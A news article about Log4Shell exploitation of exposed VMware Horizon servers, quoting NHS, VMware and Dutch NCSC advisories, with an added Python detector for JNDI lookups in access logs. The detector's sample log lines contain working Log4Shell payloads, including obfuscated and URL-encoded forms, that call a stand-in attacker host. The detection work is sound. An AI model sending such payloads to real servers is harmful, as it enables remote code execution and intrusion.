A Shodan search for Internet-exposed VMware Horizon servers turns up tens of thousands of installs potentially exposed to attacks.
In early January, threat actors started targeting VMware Horizon systems exposed on the Internet. VMware has addressed Log4Shell in Horizon with the release of versions 2111, 7.13.1 and 7.10.3, but unfortunately many unpatched systems are still exposed online.
Recently, Microsoft posted a warning about a new campaign from a China-based actor it tracks as DEV-0401 to exploit the Log4Shell vulnerability on VMware Horizon systems exposed on the internet, and deploy Night Sky ransomware.
“An unknown threat group has been observed targeting VMware Horizon servers running versions affected by Log4Shell vulnerabilities in order to establish persistence within affected networks.” reads the security advisory published by NHS.
“The attack likely consists of a reconnaissance phase, where the attacker uses the Java Naming and Directory Interface (JNDI) via Log4Shell payloads to call back to malicious infrastructure. Once a weakness has been identified, the attack then uses the Lightweight Directory Access Protocol (LDAP) to retrieve and execute a malicious Java class file that injects a web shell into the VM Blast Secure Gateway service.”
Once a web shell is installed, threat actors can use it for a broad range of malicious activities, such as data exfiltration or ransomware deployment.
After exploiting the Log4j flaws, threat actors deploy custom web shells into the VM Blast Secure Gateway service to gain access to the networks of target organizations.
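The reconnaissance phase described in the NHS advisory above, where Log4Shell payloads trigger JNDI lookups toward attacker-controlled infrastructure, leaves traces in the web-facing logs of the targeted server. The following Python is an added example, not code from Security Affairs, NHS or VMware: it scans constructed access-log lines for JNDI lookup strings, first undoing URL encoding and collapsing single-character nested lookups so that a plain string match is not trivially bypassed. The combined log format, the sample lines and the list of lookup schemes are assumptions made for the example.

```python
import re
import urllib.parse

# Constructed sample access-log lines (not real captures); IPs, paths and
# user agents are made up for this example.
SAMPLE_LOG_LINES = [
    '203.0.113.5 - - [10/Jan/2022:10:01:02 +0000] "GET /portal/ HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [10/Jan/2022:10:01:09 +0000] "GET /portal/ HTTP/1.1" 200 512 "-" "${jndi:ldap://attacker.example/a}"',
    '198.51.100.8 - - [10/Jan/2022:10:02:11 +0000] "GET /?x=${${lower:j}ndi:${lower:l}dap://attacker.example/b} HTTP/1.1" 404 0 "-" "curl/7.79"',
    '198.51.100.9 - - [10/Jan/2022:10:03:15 +0000] "GET /?x=%24%7Bjndi%3Armi%3A%2F%2Fattacker.example%2Fc%7D HTTP/1.1" 404 0 "-" "curl/7.79"',
    '203.0.113.6 - - [10/Jan/2022:10:04:20 +0000] "GET /broker/xml HTTP/1.1" 200 88 "-" "VMware-Horizon-Client"',
]

# Nested lookups such as ${lower:j} or ${::-j} evaluate to one character; collapse them.
_NESTED_LOOKUP = re.compile(r'\$\{(?:lower|upper):([a-zA-Z])\}|\$\{::-([^}])\}')
# JNDI lookup with one of the schemes assumed for this example.
_JNDI = re.compile(r'\$\{jndi:(ldap|ldaps|rmi|dns|iiop|corba|nds|http)://', re.IGNORECASE)


def normalize(text: str) -> str:
    """URL-decode (up to three layers) and collapse single-character nested lookups."""
    for _ in range(3):
        decoded = urllib.parse.unquote(text)
        if decoded == text:
            break
        text = decoded
    prev = None
    while prev != text:
        prev = text
        text = _NESTED_LOOKUP.sub(lambda m: m.group(1) or m.group(2), text)
    return text


def find_jndi_lookups(line: str) -> list:
    """Return the lower-cased scheme of every JNDI lookup found in one log line."""
    return [m.group(1).lower() for m in _JNDI.finditer(normalize(line))]


def scan_log(lines) -> list:
    """Return (source_ip, schemes) for each line carrying a JNDI lookup."""
    hits = []
    for line in lines:
        schemes = find_jndi_lookups(line)
        if schemes:
            src = line.split(' ', 1)[0]  # first field of the combined log format
            hits.append((src, schemes))
    return hits


if __name__ == "__main__":
    for src, schemes in scan_log(SAMPLE_LOG_LINES):
        print(f"{src}: JNDI lookup via {', '.join(schemes)}")
```

A hit only shows that a lookup string reached the server, not that it was evaluated; the next defender step is to correlate the source and timestamp with outbound LDAP or RMI connections from the Horizon host, which is the callback the NHS advisory describes.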
In an email to Bleeping Computer today, VMware said they are strongly urging customers to patch their Horizon servers to defend against these active attacks.
Multiple VMware products, including VMware Horizon products, are impacted by remote code execution vulnerabilities via Apache Log4j (CVE-2021-44228, CVE-2021-45046).
Recently the Dutch National Cybersecurity Centre (NCSC) warned organizations to remain vigilant about possible attacks exploiting the Log4j vulnerability. According to the Dutch agency, threat actors will continue to attempt to exploit the Log4Shell flaw in future attacks.
“Partly due to the rapid actions of many organizations, the extent of active abuse appears to be not too bad at the moment. But that doesn’t mean it stops there. It is expected that malicious parties will continue to search for vulnerable systems and carry out targeted attacks in the coming period. It is therefore important to remain vigilant.” states the Dutch NCSC agency. “The NCSC advises organizations to continue to monitor whether vulnerable systems are used and to apply updates or mitigating measures where necessary. In addition, the NCSC advises directors to stay alert by informing themselves about Log4j and the possible impact of abuse on business continuity.”
“In a zero-day situation such as the Apache Software Foundation Log4j vulnerability, cyber criminals are racing to exploit the vulnerabilities identified by CVE-2021-44228 and CVE-2021-45046 before organizations can address them. We continue to amplify the message in our security advisory, VMSA-2021-0028, urging customers to address the vulnerability immediately, including with VMware Horizon 8 and Horizon 7.x.” reads the guidance. “While most customers have followed the guidance, those who have not done so remain at risk.”
(SecurityAffairs – hacking, VMware Horizon)